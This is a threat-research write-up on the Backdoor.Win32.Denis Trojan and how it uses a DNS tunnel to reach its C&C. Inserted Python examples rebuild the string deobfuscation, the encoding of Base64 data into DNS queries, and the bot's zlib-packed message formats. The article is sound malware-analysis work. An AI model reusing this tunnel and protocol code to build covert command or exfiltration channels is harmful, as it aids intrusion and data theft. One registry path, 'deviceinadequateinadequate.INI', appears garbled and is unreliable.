Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we leave these two aside and consider the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or swap the mouse buttons.
Malware has come a long way since the Morris worm, and its authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take analysts weeks or even months to decipher. Others go back to basics and use IRC servers as a management host, as we saw in the recent case of Mirai and its numerous clones.
Often, virus writers don't even bother to encrypt or mask their communications: instructions and related data are sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of incompetent cybercriminals, or even of skilled programmers who don't have much experience developing malware.
However, you do get the occasional off-the-wall approach that doesn't fall into either of the above categories. Take, for example, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with its C&C server.
The malware in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan allows an intruder to manipulate the file system, run arbitrary commands and run loadable modules.
Just like many other Trojans before it, Backdoor.Win32.Denis extracts the addresses of the functions it needs from loaded DLLs. However, instead of calculating checksums of the names in the export table (which is what usually happens), this Trojan simply compares the names of the API calls against a list. The list of API names is encrypted by subtracting 128 from each character of the function name.
It should be noted that the bot uses two variants of this encoding: for API call names and the other strings it needs to operate, it subtracts 128 from every byte; for DLL names, it subtracts from every other byte. DLLs are loaded by name using LoadLibraryW, which means wide strings are required.
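The following is an added example (Python; it is not code from the write-up or from the Denis sample) that reproduces the two string-obfuscation variants described above as a small recovery tool. The offset of 128 and the narrow/wide distinction come from the text; the sample blob, the function names and the string-scanning heuristic are assumptions made here. Note that subtracting 128 from a byte modulo 256 is the same as adding 128 (or XOR 0x80), so the routine is its own inverse.

```python
# Added example, not the Trojan's code. Recovers strings obfuscated the way
# the text describes: every byte shifted by 128 (API names and other narrow
# strings) or every other byte shifted by 128 (UTF-16LE DLL names). Sample
# data below is constructed with the same routines.


def shift128_narrow(blob: bytes) -> bytes:
    """Subtract 128 from every byte. Mod 256 this equals adding 128, so the
    same call both obfuscates and recovers a narrow string."""
    return bytes((b - 128) & 0xFF for b in blob)


def shift128_wide(blob: bytes) -> bytes:
    """Subtract 128 from every other byte: the low byte of each UTF-16LE code
    unit carries the ASCII character, the high (usually 0x00) byte is kept."""
    out = bytearray(blob)
    for i in range(0, len(out), 2):
        out[i] = (out[i] - 128) & 0xFF
    return bytes(out)


def decrypt_api_name(blob: bytes) -> str:
    return shift128_narrow(blob).decode("ascii")


def decrypt_dll_name(blob: bytes) -> str:
    return shift128_wide(blob).decode("utf-16-le")


def find_narrow_strings(blob: bytes, min_len: int = 4) -> list:
    """Heuristic scanner (assumption, not from the sample): a NUL-terminated
    run of bytes in 0xA0..0xFE is printable ASCII + 128, i.e. a candidate
    narrow-encrypted string. Wide strings never match because every other
    byte of them is 0x00."""
    found, run = [], bytearray()
    for b in blob + b"\x00":
        if 0xA0 <= b <= 0xFE:
            run.append(b)
            continue
        if b == 0 and len(run) >= min_len:
            found.append(decrypt_api_name(bytes(run)))
        run = bytearray()
    return found


def resolve_by_name(export_names: list, encrypted_name: bytes):
    """The lookup the text describes: decrypt the name and compare it against
    the export table instead of hashing it. Returns the match or None."""
    wanted = decrypt_api_name(encrypted_name)
    return next((n for n in export_names if n == wanted), None)


# Constructed sample: two narrow API names and one wide DLL name, separated by
# NULs and some unrelated bytes, as they might sit in a data section.
SAMPLE_BLOB = (
    b"\x90\x90"
    + shift128_narrow(b"LoadLibraryW") + b"\x00"
    + shift128_narrow(b"GetTickCount") + b"\x00"
    + shift128_wide("kernel32.dll".encode("utf-16-le")) + b"\x00\x00"
)

if __name__ == "__main__":
    print(find_narrow_strings(SAMPLE_BLOB))      # ['LoadLibraryW', 'GetTickCount']
    print(decrypt_dll_name(SAMPLE_BLOB[-26:-2]))  # kernel32.dll
```

When running something like this over a real dump, keep the two variants apart: applying the narrow routine to a wide string flips the 0x00 high bytes to 0x80 and produces garbage, which is why the scanner above only collects narrow candidates and leaves wide strings to be carved by hand.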
'Decrypting' strings in the Trojan
Names of API functions and libraries in encrypted form
It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to functions resolved this way alternate with references to functions obtained from the loader.
The idea behind a DNS tunnel can be summed up as: "if you don't know, ask somebody else". When a DNS server receives a request for a name to be resolved, it first looks for it in its own database. If the record isn't found, the server forwards the request to the name server responsible for that domain, as recorded in its database.
Let's see how this works when a request arrives for the name Y3VyaW9zaXR5.example.com. The DNS server receives it and first tries to find the top-level domain '.com', then 'example.com', but fails to find 'Y3VyaW9zaXR5.example.com' in its database. It then forwards the request to the name server for example.com and asks whether the name is known to it. In response, example.com is expected to return the appropriate IP address; however, it can return an arbitrary string, including C&C instructions.
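The exchange described above, as an added example (Python; not code from the write-up or the Denis sample): a request is Base64-encoded, as in the text, and placed in the labels in front of the attacker's zone, so that every resolver along the way forwards it unchanged to that zone's name server. The 63-octet label and 253-character name limits are from RFC 1035; the chunking rule, the function names and the zone "example.com" are assumptions. No packets are sent.

```python
import base64
import struct

# Added example, not the Trojan's code: the DNS side of the tunnel. The client
# hides its request in the labels in front of the attacker's zone; the zone's
# name server strips its own suffix and decodes what is left.

MAX_LABEL = 63    # one DNS label is at most 63 octets (RFC 1035)
MAX_NAME = 253    # textual name limit (255 octets on the wire)


def payload_to_name(payload: bytes, zone: str) -> str:
    """Encode a request as labels under `zone`, splitting every 63 characters.
    The split rule is an assumption needed to respect the label limit."""
    b64 = base64.b64encode(payload).decode("ascii")
    labels = [b64[i:i + MAX_LABEL] for i in range(0, len(b64), MAX_LABEL)]
    name = ".".join(labels + [zone])
    if len(name) > MAX_NAME:
        raise ValueError("payload does not fit in one query name")
    return name


def name_to_payload(name: str, zone: str) -> bytes:
    """What the zone's name server does: drop its own suffix, join the rest."""
    suffix = "." + zone
    if not name.endswith(suffix):
        raise ValueError("query is not for our zone")
    return base64.b64decode("".join(name[:-len(suffix)].split(".")))


def encode_qname(name: str) -> bytes:
    """Wire format: length-prefixed labels, terminated by a zero length."""
    out = b""
    for label in name.split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= MAX_LABEL:
            raise ValueError("label length out of range: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, txid: int, qtype: int = 1) -> bytes:
    """Minimal query: 12-byte header with RD set, one question, class IN,
    record type A by default (qtype=1)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", qtype, 1)


def decode_qname(packet: bytes, offset: int = 12) -> str:
    """Read the QNAME back out of a query. The first name in a packet is
    never compressed, so no pointer handling is needed here."""
    labels = []
    while True:
        n = packet[offset]
        offset += 1
        if n == 0:
            return ".".join(labels)
        labels.append(packet[offset:offset + n].decode("ascii"))
        offset += n


if __name__ == "__main__":
    name = payload_to_name(b"curiosity", "example.com")
    print(name)                             # Y3VyaW9zaXR5.example.com
    pkt = build_query(name, 0x1234)
    print(decode_qname(pkt), len(pkt))      # Y3VyaW9zaXR5.example.com 42
```

Two caveats a practitioner will run into: standard Base64 uses '+', '/' and '=', which are legal in a label on the wire but not in a hostname, so some resolvers and middleboxes mangle or drop such queries; and DNS names are case-insensitive, so a resolver that randomizes label case (0x20 encoding) corrupts a Base64 payload before it reaches the authoritative server. The same properties (long, high-entropy, mixed-case labels under one zone) are what make this traffic stand out in resolver logs.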
Dump of Backdoor.Win32.Denis traffic
This is what Backdoor.Win32.Denis does. The DNS request is sent first to 8.8.8.8, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.
Here is the response:
DNS packet received in response to the first request
Obviously, the request sent to the C&C is encoded with Base64 (an encoding, not encryption, so it offers no secrecy). The original request is a sequence of zeros with the result of GetTickCount at the end. The bot then receives its unique ID and uses it to identify itself at the beginning of each packet.
The instruction number is sent in the fifth DWORD, counting from the beginning of the section highlighted in green in the diagram above. Next comes the size of the data received from the C&C. The data itself, packed with zlib, begins immediately after that.
The unpacked C&C response
The first 4 bytes are the data size. Everything that follows is the data, which varies depending on the type of instruction. In this case it is the unique ID of the bot, as mentioned earlier. Note that the data in the packet is in big-endian format.
The bot ID (highlighted) is stated at the beginning of each request sent to the C&C
Altogether, there are 16 instructions the Trojan can handle, even though the number of the last instruction is 20. Most of the instructions involve interaction with the file system of the attacked computer. There are also capabilities to obtain information about open windows, call an arbitrary API or obtain brief information about the system. Let's look at the last of these in more detail, as this instruction is executed first.
Full list of C&C instructions
Information about the infected computer, sent to the C&C
As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the information stored in the registry branch deviceinadequateinadequate.INI:
- The time when that specific instruction was last executed (if it is being executed for the first time, the result of GetSystemTimeAsFileTime is returned and the variable BounceTime, into which the result is written, is set);
- UsageCount from the same registry branch.
Information about the operating system and the environment is also sent. This information is obtained with the help of NetWkstaGetInfo.
The data is packed using zlib.
The DNS response prior to Base64 encoding
The fields in the response are as follows (only the part highlighted in red, with the data and its size, varies depending on the instruction):
- Bot ID;
- Size of the previous C&C response;
- The third DWORD of the C&C response;
- Always equals 1 for a response;
- Size of the data after this field;
- Size of the response;
- The actual response.
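An added example (Python; not code from the write-up or the Denis sample) of the packet layer that rides inside the DNS tunnel, in both directions: the C&C response layout from the paragraphs on the instruction number, data size and zlib-packed data above, and the seven-field bot reply just listed. Assumptions made here: the first four DWORDs of a C&C response are treated as opaque header values; "size of the previous C&C response" is taken as its total length in bytes; the bot's payload is the zlib-packed system information; the instruction number, header values and system information in the walk-through are illustrative, not taken from the sample. Everything is big-endian, as the text states.

```python
import struct
import zlib

# Added example, not the Trojan's code. Field order follows the text; the
# meaning of the leading header DWORDs and the sample values are assumptions.
#   C&C -> bot : DWORD[0..3] header, DWORD[4] instruction, DWORD[5] size of
#                the zlib blob that follows; unpacked blob = DWORD size + data.
#   bot -> C&C : bot id, size of previous C&C response, third DWORD of that
#                response, constant 1, size of everything after this field,
#                size of the response, response (zlib-packed). Big-endian.

INSTRUCTION_SYSINFO = 3   # illustrative number; the page does not give it


def parse_cnc_response(raw: bytes) -> dict:
    if len(raw) < 24:
        raise ValueError("truncated C&C response")
    hdr = struct.unpack(">6I", raw[:24])
    instruction, blob_size = hdr[4], hdr[5]
    blob = raw[24:24 + blob_size]
    if len(blob) != blob_size:
        raise ValueError("declared blob size exceeds packet")
    unpacked = zlib.decompress(blob)
    (data_size,) = struct.unpack(">I", unpacked[:4])
    data = unpacked[4:4 + data_size]
    if len(data) != data_size:
        raise ValueError("inner size does not match unpacked data")
    return {"header": hdr[:4], "instruction": instruction,
            "third_dword": hdr[2], "total_size": len(raw), "data": data}


def build_cnc_response(header: tuple, instruction: int, data: bytes) -> bytes:
    """Inverse of parse_cnc_response, used to construct sample traffic."""
    blob = zlib.compress(struct.pack(">I", len(data)) + data)
    return struct.pack(">6I", *header, instruction, len(blob)) + blob


def build_bot_reply(bot_id: int, prev: dict, payload: bytes) -> bytes:
    """The seven fields listed in the text; `prev` is the parsed C&C message
    this reply answers."""
    packed = zlib.compress(payload)
    tail = struct.pack(">I", len(packed)) + packed   # size of response + response
    return struct.pack(">5I", bot_id, prev["total_size"], prev["third_dword"],
                       1, len(tail)) + tail


def parse_bot_reply(raw: bytes) -> dict:
    bot_id, prev_size, third, flag, tail_size = struct.unpack(">5I", raw[:20])
    if flag != 1:
        raise ValueError("not a bot response (flag != 1)")
    tail = raw[20:20 + tail_size]
    if len(tail) != tail_size:
        raise ValueError("declared tail size exceeds packet")
    (resp_size,) = struct.unpack(">I", tail[:4])
    return {"bot_id": bot_id, "prev_size": prev_size, "third_dword": third,
            "payload": zlib.decompress(tail[4:4 + resp_size])}


def registration_exchange() -> dict:
    """First exchange: the C&C hands out the bot ID, the bot answers with its
    system information. All values below are constructed for illustration."""
    cnc = build_cnc_response((0, 0, 0xAABBCCDD, 0), INSTRUCTION_SYSINFO,
                             (0x1F2E3D4C).to_bytes(4, "big"))
    parsed = parse_cnc_response(cnc)
    bot_id = int.from_bytes(parsed["data"], "big")
    info = b"WORKSTATION-01\x00analyst\x00UsageCount=1\x00"
    reply = build_bot_reply(bot_id, parsed, info)
    return {"bot_id": bot_id, "cnc_len": len(cnc), "reply_len": len(reply),
            "echo": parse_bot_reply(reply)}


if __name__ == "__main__":
    print(registration_exchange())
```

The length checks before each zlib.decompress are deliberate: a parser fed from a packet capture will see truncated or concatenated DNS payloads, and failing on a size mismatch is more useful than a zlib error deep inside. Base64 encoding and splitting into DNS labels sit on top of these bytes and are not repeated here.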
After the registration stage is complete, the Trojan starts to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a sequence of empty queries and responses.
Sequence of empty queries sent to the C&C
Using a DNS tunnel for communication, as Backdoor.Win32.Denis does, is an extremely rare occurrence, albeit not unique. A similar technique was previously used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this use of the DNS protocol is new on PCs. We presume this method is likely to become increasingly popular with malware writers. We'll keep an eye on how this approach is implemented in malicious programs in the future.